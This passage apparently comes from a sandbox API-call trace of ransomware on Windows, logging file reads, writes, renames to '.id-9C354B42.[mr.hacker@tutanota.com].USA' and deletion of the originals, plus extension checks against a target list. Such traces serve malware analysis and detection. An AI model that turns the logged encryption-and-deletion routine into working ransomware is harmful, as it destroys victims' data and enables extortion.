nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.027] SetEndOfFile (hFile=0x388) returned 1 [0273.027] CloseHandle (hObject=0x388) returned 1 [0273.027] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.028] SetEndOfFile (hFile=0x3a8) returned 1 [0273.031] CloseHandle (hObject=0x3a8) returned 1 [0273.031] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.031] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01291_.wmf")) returned 1 [0273.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63 [0273.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63 [0273.031] lstrlenW (lpString=".doc") returned 4 [0273.031] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.031] lstrlenW (lpString=".docx") returned 5 [0273.031] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.031] lstrlenW (lpString=".pdf") returned 4 [0273.031] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.031] lstrlenW (lpString=".xls") returned 4 [0273.032] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.032] lstrlenW (lpString=".xlsx") returned 5 [0273.032] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.032] lstrlenW (lpString=".ppt") returned 4 [0273.032] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63 [0273.032] lstrlenW (lpString=".zip") returned 4 [0273.032] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.032] lstrlenW (lpString=".rar") returned 4 [0273.032] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.032] lstrlenW (lpString=".bz2") returned 4 [0273.032] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.032] lstrlenW (lpString=".7z") returned 3 [0273.032] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63 [0273.032] lstrlenW (lpString=".dbf") returned 4 [0273.032] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63 [0273.032] lstrlenW (lpString=".1cd") returned 4 [0273.032] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63 [0273.032] lstrlenW (lpString=".jpg") returned 4 [0273.032] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63 [0273.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63 [0273.032] lstrlenW (lpString=".doc") returned 4 [0273.032] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.032] lstrlenW (lpString=".docx") returned 5 [0273.032] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.032] lstrlenW (lpString=".pdf") returned 4 [0273.032] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.033] lstrlenW (lpString=".xls") returned 4 [0273.033] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.033] lstrlenW (lpString=".xlsx") returned 5 [0273.033] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.033] lstrlenW (lpString=".ppt") returned 4 [0273.033] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63 [0273.033] lstrlenW (lpString=".zip") returned 4 [0273.033] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.033] lstrlenW (lpString=".rar") returned 4 [0273.033] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.033] lstrlenW (lpString=".bz2") returned 4 [0273.033] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.033] lstrlenW (lpString=".7z") returned 3 [0273.033] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63 [0273.033] lstrlenW (lpString=".dbf") returned 4 [0273.033] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63 [0273.033] lstrlenW (lpString=".1cd") returned 4 [0273.033] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 63 [0273.033] lstrlenW (lpString=".jpg") returned 4 [0273.033] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.033] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.033] lstrlenW (lpString="HH01329_.WMF") returned 12 [0273.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01329_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.034] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=6016) returned 1 [0273.034] CloseHandle (hObject=0x3a8) returned 1 [0273.034] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01329_.wmf")) returned 0x20 [0273.034] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01329_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01329_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.034] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.034] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01329_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.034] GetLastError () returned 0x0 [0273.034] ReadFile (in: hFile=0x3a8, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x1780, lpOverlapped=0x0) returned 1 [0273.036] WriteFile (in: hFile=0x388, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x1790, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x1790, lpOverlapped=0x0) returned 1 [0273.037] ReadFile (in: hFile=0x3a8, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.037] WriteFile (in: hFile=0x388, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.037] SetEndOfFile (hFile=0x388) returned 1 [0273.037] CloseHandle (hObject=0x388) returned 1 [0273.037] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.037] SetEndOfFile (hFile=0x3a8) returned 1 [0273.038] CloseHandle (hObject=0x3a8) returned 1 [0273.039] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.039] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01329_.wmf")) returned 1 [0273.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63 [0273.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63 [0273.039] lstrlenW (lpString=".doc") returned 4 [0273.039] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.039] lstrlenW (lpString=".docx") returned 5 [0273.039] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.039] lstrlenW (lpString=".pdf") returned 4 [0273.039] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.039] lstrlenW (lpString=".xls") returned 4 [0273.039] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.039] lstrlenW (lpString=".xlsx") returned 5 [0273.039] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.039] lstrlenW (lpString=".ppt") returned 4 [0273.039] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63 [0273.039] lstrlenW (lpString=".zip") returned 4 [0273.039] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.039] lstrlenW (lpString=".rar") returned 4 [0273.039] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.039] lstrlenW (lpString=".bz2") returned 4 [0273.039] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.040] lstrlenW (lpString=".7z") returned 3 [0273.040] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63 [0273.040] lstrlenW (lpString=".dbf") returned 4 [0273.040] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63 [0273.040] lstrlenW (lpString=".1cd") returned 4 [0273.040] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63 [0273.040] lstrlenW (lpString=".jpg") returned 4 [0273.040] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63 [0273.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63 [0273.040] lstrlenW (lpString=".doc") returned 4 [0273.040] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.040] lstrlenW (lpString=".docx") returned 5 [0273.040] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.040] lstrlenW (lpString=".pdf") returned 4 [0273.040] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.040] lstrlenW (lpString=".xls") returned 4 [0273.040] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.040] lstrlenW (lpString=".xlsx") returned 5 [0273.040] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.040] lstrlenW (lpString=".ppt") returned 4 [0273.040] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63 [0273.040] lstrlenW (lpString=".zip") returned 4 [0273.040] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.040] lstrlenW (lpString=".rar") returned 4 [0273.040] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.040] lstrlenW (lpString=".bz2") returned 4 [0273.041] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.041] lstrlenW (lpString=".7z") returned 3 [0273.041] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63 [0273.041] lstrlenW (lpString=".dbf") returned 4 [0273.080] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63 [0273.080] lstrlenW (lpString=".1cd") returned 4 [0273.080] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63 [0273.081] lstrlenW (lpString=".jpg") returned 4 [0273.081] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.081] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.081] lstrlenW (lpString="HH01923_.WMF") returned 12 [0273.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.124] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=26706) returned 1 [0273.124] CloseHandle (hObject=0x2bc) returned 1 [0273.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf")) returned 0x20 [0273.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.125] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.125] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0273.125] GetLastError () returned 0x0 [0273.125] ReadFile (in: hFile=0x2bc, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x6852, lpOverlapped=0x0) returned 1 [0273.167] WriteFile (in: hFile=0x3a4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x6860, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x6860, lpOverlapped=0x0) returned 1 [0273.168] ReadFile (in: hFile=0x2bc, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.168] WriteFile (in: hFile=0x3a4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.168] SetEndOfFile (hFile=0x3a4) returned 1 [0273.168] CloseHandle (hObject=0x3a4) returned 1 [0273.168] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.168] SetEndOfFile (hFile=0x2bc) returned 1 [0273.171] CloseHandle (hObject=0x2bc) returned 1 [0273.171] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.176] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf")) returned 1 [0273.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63 [0273.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63 [0273.184] lstrlenW (lpString=".doc") returned 4 [0273.184] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.184] lstrlenW (lpString=".docx") returned 5 [0273.184] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.184] lstrlenW (lpString=".pdf") returned 4 [0273.184] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.184] lstrlenW (lpString=".xls") returned 4 [0273.184] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.184] lstrlenW (lpString=".xlsx") returned 5 [0273.184] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.184] lstrlenW (lpString=".ppt") returned 4 [0273.184] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63 [0273.184] lstrlenW (lpString=".zip") returned 4 [0273.184] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.184] lstrlenW (lpString=".rar") returned 4 [0273.184] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.184] lstrlenW (lpString=".bz2") returned 4 [0273.184] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.184] lstrlenW (lpString=".7z") returned 3 [0273.184] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63 [0273.184] lstrlenW (lpString=".dbf") returned 4 [0273.184] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63 [0273.184] lstrlenW (lpString=".1cd") returned 4 [0273.185] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63 [0273.185] lstrlenW (lpString=".jpg") returned 4 [0273.185] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63 [0273.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63 [0273.185] lstrlenW (lpString=".doc") returned 4 [0273.185] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.185] lstrlenW (lpString=".docx") returned 5 [0273.185] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.185] lstrlenW (lpString=".pdf") returned 4 [0273.185] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.185] lstrlenW (lpString=".xls") returned 4 [0273.185] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.185] lstrlenW (lpString=".xlsx") returned 5 [0273.185] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.185] lstrlenW (lpString=".ppt") returned 4 [0273.185] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63 [0273.185] lstrlenW (lpString=".zip") returned 4 [0273.185] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.185] lstrlenW (lpString=".rar") returned 4 [0273.185] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.185] lstrlenW (lpString=".bz2") returned 4 [0273.185] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.185] lstrlenW (lpString=".7z") returned 3 [0273.185] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63 [0273.185] lstrlenW (lpString=".dbf") returned 4 [0273.185] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63 [0273.186] lstrlenW (lpString=".1cd") returned 4 [0273.186] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63 [0273.186] lstrlenW (lpString=".jpg") returned 4 [0273.186] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.186] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.186] lstrlenW (lpString="HH02313_.WMF") returned 12 [0273.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02313_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.186] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=3082) returned 1 [0273.186] CloseHandle (hObject=0x2bc) returned 1 [0273.186] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02313_.wmf")) returned 0x20 [0273.186] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02313_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02313_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.187] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.187] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02313_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.187] GetLastError () returned 0x0 [0273.187] ReadFile (in: hFile=0x2bc, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0xc0a, lpOverlapped=0x0) returned 1 [0273.188] WriteFile (in: hFile=0x2ac, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xc10, lpOverlapped=0x0) returned 1 [0273.189] ReadFile (in: hFile=0x2bc, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.189] WriteFile (in: hFile=0x2ac, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.189] SetEndOfFile (hFile=0x2ac) returned 1 [0273.189] CloseHandle (hObject=0x2ac) returned 1 [0273.189] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.189] SetEndOfFile (hFile=0x2bc) returned 1 [0273.191] CloseHandle 